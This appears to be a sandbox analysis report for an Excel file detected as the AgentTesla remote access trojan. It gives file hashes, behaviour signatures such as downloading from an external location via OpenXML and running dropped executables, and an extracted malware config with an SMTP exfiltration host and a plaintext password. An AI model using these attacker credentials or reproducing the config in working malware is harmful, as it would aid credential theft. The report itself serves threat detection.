General
-
Target
$267700.xlsx
-
Size
200KB
-
Sample
210226-nnwe6qpdhx
-
MD5
df0dbb4b27bda8afcdc08455003739e7
-
SHA1
86057b50f54296163776720171c21c2a946778e6
-
SHA256
86e3101420d0467712a6920229e34bce70e978598abb37373c53306f937f8db7
-
SHA512
4836c2aaf5dc450fb1a859770c735c1cfd2887dbeb779cc15c56e9a840f63e3a7d43d352dad3583eae4db2bcb7d31ea807f7f68258c258b423e9992c652cc3e2
Static task
static1
Behavioral task
behavioral1
Sample
$267700.xlsx
Resource
win7v20201028
Behavioral task
behavioral2
Sample
$267700.xlsx
Resource
win10v20201028
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.privateemail.com - Port:
587 - Username:
[email protected] - Password:
lord@blessme
Targets
-
-
Target
$267700.xlsx
-
Size
200KB
-
MD5
df0dbb4b27bda8afcdc08455003739e7
-
SHA1
86057b50f54296163776720171c21c2a946778e6
-
SHA256
86e3101420d0467712a6920229e34bce70e978598abb37373c53306f937f8db7
-
SHA512
4836c2aaf5dc450fb1a859770c735c1cfd2887dbeb779cc15c56e9a840f63e3a7d43d352dad3583eae4db2bcb7d31ea807f7f68258c258b423e9992c652cc3e2
Score10/10-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla Payload
-
Blocklisted process makes network request
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Suspicious use of SetThreadContext
-